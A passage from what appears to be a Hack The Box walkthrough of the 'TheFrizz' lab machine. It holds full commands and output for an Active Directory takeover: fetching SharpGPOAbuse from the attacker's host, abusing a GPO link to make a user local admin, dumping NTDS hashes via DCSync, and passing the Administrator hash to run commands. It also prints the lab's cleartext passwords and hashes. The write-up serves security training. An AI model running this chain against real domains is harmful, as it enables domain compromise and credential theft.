[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_domains.json created!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_gpos.json created!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] 73 containers parsed!
[2025-09-18T02:51:11Z INFO  rusthound_ce::json::maker::common] .//20250918055111_frzzdc-frizz-htb_containers.json created!

RustHound-CE Enumeration Completed at 05:51:11 on 09/18/25! Happy Graphing!

BloodHound-Python

Start BloodHound:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/TheFrizz/bloodhound]
└─$ sudo bloodhound         
[sudo] password for kali: 

 Starting neo4j
<snipped>

 Bloodhound will start

 IMPORTANT: It will take time, please wait...


 opening http://127.0.0.1:8080
<snipped>

Searching for outbound object controls for m.schoolbus we will find that he/she is member of the group policy creator owners, which:

Thereby it has writegplink over the domain controllers:

Shell as m.schoolbus:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ impacket-getTGT 'frizz.htb/M.SchoolBus:!suBcig@MehTed!R' -dc-ip 10.129.20.43
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in M.SchoolBus.ccache

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ export KRB5CCNAME=M.SchoolBus.ccache     

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ klist                      
Ticket cache: FILE:M.SchoolBus.ccache
Default principal: M.SchoolBus@FRIZZ.HTB

Valid starting       Expires              Service principal
09/18/2025 07:18:20  09/18/2025 17:18:20  krbtgt/FRIZZ.HTB@FRIZZ.HTB
        renew until 09/19/2025 07:18:20
        
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ ssh m.schoolbus@frizz.htb
PowerShell 7.4.5
PS C:\Users\M.SchoolBus>

We can use various tools to abuse this GPO write link ACL. I will use sharpgpoabuse.exe:

PS C:\Users\M.SchoolBus> cd C:\Windows\Tasks
PS C:\Windows\Tasks> curl http://10.10.16.2/SharpGPOAbuse.exe -o SharpGPOAbuse.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 71168  100 71168    0     0  72640      0 --:--:-- --:--:-- --:--:-- 72620
PS C:\Windows\Tasks> ls

    Directory: C:\Windows\Tasks

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---           9/17/2025  6:57 PM        9760768 chisel.exe
-a---           9/17/2025  9:21 PM          71168 SharpGPOAbuse.exe

View sharpgpoabuse options and attacks:

PS C:\Windows\Tasks> .\SharpGPOAbuse.exe

Usage: 
        SharpGPOAbuse.exe <AttackType> <AttackOptions>

Attack Types:
--AddUserRights
        Add rights to a user account
--AddLocalAdmin
        Add a new local admin. This will replace any existing local admins!
--AddComputerScript
        Add a new computer startup script
--AddUserScript
        Add a new user startup script
--AddComputerTask
        Add a new computer immediate task
--AddUserTask
        Add a new user immediate task


Options required to add a new local admin: 
--UserAccount
        Set the name of the account to be added in local admins.
--GPOName
        The name of the vulnerable GPO.


Options required to add a new user startup script:
--ScriptName
        Set the name of the new startup script.
--ScriptContents
        Set the contents of the new startup script.
--GPOName
        The name of the vulnerable GPO.


Options required to add a new computer startup script:
--ScriptName
        Set the name of the new startup script.
--ScriptContents
        Set the contents of the new startup script.
--GPOName
        The name of the vulnerable GPO.


Options required to add new user rights:
--UserRights
        Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
--UserAccount
        Set the account to add the new rights.
--GPOName
        The name of the vulnerable GPO.


Options required to add a new computer immediate task:
--TaskName
        Set the name of the new computer task.
--Author
        Set the author of the new task (use a DA account).
--Command
        Command to execute.
--Arguments
        Arguments passed to the command.
        Enable Target Filtering for user immediate tasks.
--TargetUsername
        The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>
--TargetUserSID
        The targeted user's SID.           


Other options:
--DomainController
        Set the target domain controller.  
--Domain
        Set the target domain.             
--Force
        Overwrite existing files if required.

So we can abuse this write link with a variety of attacks one of them being adding our selves to the local administrators group.

But first we have to create a GPO, and link it to the domain controllers OU:

PS C:\Windows\Tasks> New-GPO -Name "Windows Firewall GPO" | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes
                                           
GpoId       : 68ce3cbc-c645-4c4e-9bcc-ebd0f9bd61c0
DisplayName : Windows Firewall GPO
Enabled     : True
Enforced    : False
Target      : OU=Domain Controllers,DC=frizz,DC=htb
Order       : 3

Now we can abuse that GPO with sharpgpoabuse:

PS C:\Windows\Tasks> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount m.schoolbus --GPONAME "Windows Firewall GPO"                                                        
[+] Domain = frizz.htb                     
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of m.schoolbus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "Windows Firewall GPO" is: {68CE3CBC-C645-4C4E-9BCC-EBD0F9BD61C0}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{68CE3CBC-C645-4C4E-9BCC-EBD0F9BD61C0}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

Now we should update the policies:

PS C:\Windows\Tasks> gpupdate /force                                                                                                                                       
Updating policy...                         

Computer Policy update has completed successfully.
User Policy update has completed successfully.

Check if we are now admins:

PS C:\Windows\Tasks> net user m.schoolbus                                             
User name                    M.SchoolBus
Full Name                    Marvin SchoolBus
Comment                      Desktop Administrator
User''s comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/29/2024 7:27:03 AM
Password expires             Never
Password changeable          10/29/2024 7:27:03 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   9/17/2025 9:19:45 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *Domain Users         *Desktop Admins
The command completed successfully.

PS C:\Windows\Tasks> exit
Connection to frizz.htb closed.

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u m.schoolbus -p '!suBcig@MehTed!R'                 
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\m.schoolbus:!suBcig@MehTed!R (Pwn3d!)

Post-Exploitation:

DCSync Attack:

We can now perform the DCSync attack to get the ntlm hash of the domain administrator.

I will do that by use netexec this time:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u m.schoolbus -p '!suBcig@MehTed!R' --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] 
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\m.schoolbus:!suBcig@MehTed!R (Pwn3d!)
SMB         frizzdc.frizz.htb 445    frizzdc          [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         frizzdc.frizz.htb 445    frizzdc          Administrator:500:aad3b435b51404eeaad3b435b51404ee:c457b5f1c315bef53b9cabc92e993d0b:::
<snipped>

We can now get the flags:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]                                                                                                                     
└─$ nxc smb frizzdc.frizz.htb -k -u administrator -H c457b5f1c315bef53b9cabc92e993d0b -X 'whoami;hostname;ipconfig;type C:\Users\Administrator\Desktop\root.txt;type C:\Use
rs\f.frizzle\Desktop\user.txt'                                                                                                                                             
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)                                 
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\administrator:c457b5f1c315bef53b9cabc92e993d0b (Pwn3d!)                                                
SMB         frizzdc.frizz.htb 445    frizzdc          [+] Executed command via wmiexec                                                                                     
SMB         frizzdc.frizz.htb 445    frizzdc          frizz\administrator                                                                                                  
SMB         frizzdc.frizz.htb 445    frizzdc          frizzdc                                                                                                              
SMB         frizzdc.frizz.htb 445    frizzdc          Windows IP Configuration                                                                                             
SMB         frizzdc.frizz.htb 445    frizzdc          Ethernet adapter Ethernet0 2:                                                                                        
SMB         frizzdc.frizz.htb 445    frizzdc             Connection-specific DNS Suffix  . : .htb                                                                          
SMB         frizzdc.frizz.htb 445    frizzdc             IPv6 Address. . . . . . . . . . . : dead:beef::339b:6039:c571:9f0c                                                
SMB         frizzdc.frizz.htb 445    frizzdc             Link-local IPv6 Address . . . . . : fe80::903f:7dc4:c0ba:362e%5                                                   
SMB         frizzdc.frizz.htb 445    frizzdc             IPv4 Address. . . . . . . . . . . : 10.129.20.43                                                                  
SMB         frizzdc.frizz.htb 445    frizzdc             Subnet Mask . . . . . . . . . . . : 255.255.0.0                                                                   
SMB         frizzdc.frizz.htb 445    frizzdc             Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%5                                                    
SMB         frizzdc.frizz.htb 445    frizzdc                                                 10.129.0.1                                                                    
SMB         frizzdc.frizz.htb 445    frizzdc          #< CLIXML                                                                                                            
SMB         frizzdc.frizz.htb 445    frizzdc          4ebba94604de0fcec8619fe5d85143ee                                                                                     
SMB         frizzdc.frizz.htb 445    frizzdc          32f33794e20e852937ce93e1d75ea46f                                                                                     
SMB         frizzdc.frizz.htb 445    frizzdc          <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId
="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0<
/AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>